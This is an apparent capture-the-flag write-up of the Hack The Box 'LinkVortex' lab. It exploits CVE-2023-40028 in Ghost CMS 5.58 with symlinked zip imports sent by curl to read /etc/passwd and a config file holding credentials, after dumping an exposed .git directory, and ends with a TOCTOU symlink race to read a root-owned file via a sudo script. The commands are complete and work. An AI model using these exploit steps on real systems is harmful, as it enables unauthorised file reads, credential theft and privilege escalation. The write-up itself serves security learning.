CVE-2023-40028 Arbitrary File Read - Ghost CMS 5.58.0

Enumeration 

The first scan with the NMAP shows a 80 port redirected to the address http://linkvortex.htb. For DNS resolution, insert ip and hostname in /etc/hosts file. 

nmap -Pn -T4 -sC -sV [IP]

With correct DNS resolution, I can access the site.  

The early step is a directory scan, where i found the files robots.txt and sitemap.xml. 

The file robots.txt reveals an administrative interface http://linkvortex.htb/ghost/#/signin. A new scan of the /ghost directory was performed without significantly results. 

FFUF Discovery Subdomains

The tool FFUF can be used for subdomain discovery. This technique modifying the "host" header in HTTP request, for example -H "Host:TESTE.dominio".

ffuf -u http://[URL] -H "Host: TESTE.linkvortex.htb" -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:TESTE -fc 301

The subdomain dev.linkvortex.htb is discovery. 

In site dev.linkvortex.htb i didn't find any relevant result, so I used DIRSEARCH for a new scan and discovered exposed .git directory.  

Comando: dirsearch -u http://dev.linkvortex.htb/ 

What is .git directory? 

The .git is a hidden directory and is created when a repository is initialized (git init) or when is cloned (git clone). 

This directory stores all metadata and necessary objects for version control, including: 

• 🔹 Commits history: (objects that record snapshots of project in the time).

• 🔹 Branches e tags.

• 🔹 Staging area (index) – where the files prepared for the next commit are located).

• 🔹 Repository configuration (.git/config).

• 🔹 Remote references (information about origin, etc).

• 🔹 Git objects (compressed files like blobs, trees e commits).

Previously I make a article with a scenario similar and I used the tool git-dumper for download files.

Command: python3 git_dumper.py http://dev.linkvortex.htb [diretório] 

Right away, I executed the command git diff --cached to see the information that will be included in the next commit (git commit). 

I tried to access with the credentials I found and it didn't work. I used the credentials found in the log file and it still didn't work. For both cases, the application informs that the user doesn't exist. 

But the access work with the credential admin@linkvortex.htb and the password OctopiFociPilfer45. 

The version of CMS Ghost is 5.58 and has a exploit available.  

In the exploit, the path vulnerable is /ghost/api/v3/admin/db/ and the first access automatically download a file bitbybit-hardware but any important information has in this file, only confirm the vulnerability Arbitrary File Read.    

The exploit consist in import a zip file with a symbolic link for internal files in the server, like /etc/passwd. The zip file is imported in path /content/images/2024/ and I access this directory in .git previously downloaded. 

In my case, it does not have 2024 folder, so I don´t know why exploit import zip file for this specific location. 

Manualy, I created a image that has a symbolic link for /etc/passwd. 

ln -s /etc/passwd teste.png

After created image with symbolic link, I make a zip file 

zip -y -r test.zip . 

Like explain in another article, the vulnerability can be exploited manually with curl request: 

curl -X POST "http://linkvortex.htb/ghost/api/admin/db" -F "importfile=@test.zip" -b 'ghost-admin-api-session=s%3ACxASttgx4o84jItS-rTGEurS5w9LVi4U.d3tFak8ozgkFe0Xr2AQMeJAWu0HAWP1Vbsg5N2Fu1f4' 

And the result of a request with import is content of /etc/passwd. First I make a import [1] and then I access /content/images/ [2] where image with a symbolic are stored. 

Great! But for complete this lab, HTB ask for Bob password. So I search in .git directory for e-mail like @linkvortex.htb with command: grep -r '@linkvortex.htb' but don't find a credential. 

Previously, the output of command git diff --cached shows a copy of config.prodution.json for a path /var/lib/ghost/config.production.json. I use the vulnerability (CVE-2023-40028) for read this file. 

Steps: 

1 - Create a image with a symbolic link for /var/lib/ghost/config.prodution.json

ln -s /var/lib/ghost/config.production.json exploit.png

2 - Create a zip file and use option -y to include image with symbolic link

zip -y -r exploit.zip .

3 - Import zip file. The option -F  and the parameter "importfile=@exploit.zip" make this task

curl http://linkvortex.htb/ghost/api/admin/db -F "importfile=@exploit.zip" -b 'ghost-admin-api-session=s%3ACxASttgx4o84jItS-rTGEurS5w9LVi4U.d3tFak8ozgkFe0Xr2AQMeJAWu0HAWP1Vbsg5N2Fu1f4'

4 - Finally, I access the path /content/images where malicious file was imported

curl -b 'ghost-admin-api-session=s%3ACxASttgx4o84jItS-rTGEurS5w9LVi4U.d3tFak8ozgkFe0Xr2AQMeJAWu0HAWP1Vbsg5N2Fu1f4' http://linkvortex.htb/content/images/exploit.png

The config.production.json has a SMTP configuration, where I found Bob credential. 

This server has a SSH service and Bob has access to it. 

For privilege escalation in this lab, Bob has root permission on script /opt/ghost/clean_symbolik.sh 

I access this script to understand your function. 

This Bash script is a security measure against malicious symbolic links in .png files. It verifies if a png file is a real image. If the file is a symbolic link,  the path is checked: 

• If the link points to a critical path such as /etc or /root, the file is removed immediately
• If it is a real image, then is moved to quarantine directory at /var/quarantined

Optionally, the script can display file's content if variable CHECK_CONTENT=true. 

To make a privilege escalation, I can exploit a time-based TOCTOU to execute a script between steps a running in clean_symlink.sh. 

TOCTOU vulnerability is a class of race-condition vulnerabilities that occur when a program checks some property of a resource (time-of-check) and later uses the resource (time-of-use) assuming the property still holds, but an attacker changes the resource in the small time window between check and use. The result: the program acts on a different resource than it intended.

Filesystem: typical example: access()/stat() then open() (symlink or replace between calls).

That is exactly what I can do to execute my image symbolic link between checks of clean_symlink.sh. If successful the content of my malicious file is display. 

Great Explain: 

"If I can run a command between the time that it checks the target of the link and when it prints the contents of the file, I can change the target of the link.

When the link is checked, it’s in the original location pointing at a dummy non-flagged value. Then if it passes the scan, it is moved to $QUAR_DIR, and then the contents are printed. I’ll have a continuous loop looking for the file I want in $QUAR_DIR and overwriting it, hoping that I can do so before the contents are read."

Command: while true; do ln -sf /root/root.txt /var/quarantined/toctou.png; done

Options -f force overwrite if file already exist. 

First i create a loop that make a symbolic link from /root/root.txt to /var/quarantined/toutou.png. Then I create a symbolic link of the file .bashrc on image toctou.png in directory /dev/shm

 ln -s /home/bob/.bashrc /dev/shm/toctou.png

List the link, command:  ls -l /dev/shm/toctou.png

Finally, I executed script clean_symlink.sh to check my image toctou.png in /dev/shm. Script validated image and send to /var/quarantined directory, and because image has a symbolic link to /root/root.txt, the content is display. 

CHECK_CONTENT=true sudo bash /opt/ghost/clean_symlink.sh /dev/shm/toctou.png 

Content of /root/root.txt

This lab demonstrated exploitation of CVE-2023-40028 and TOCTOU vulnerability technical that change target in execution.  

#HACKINGBR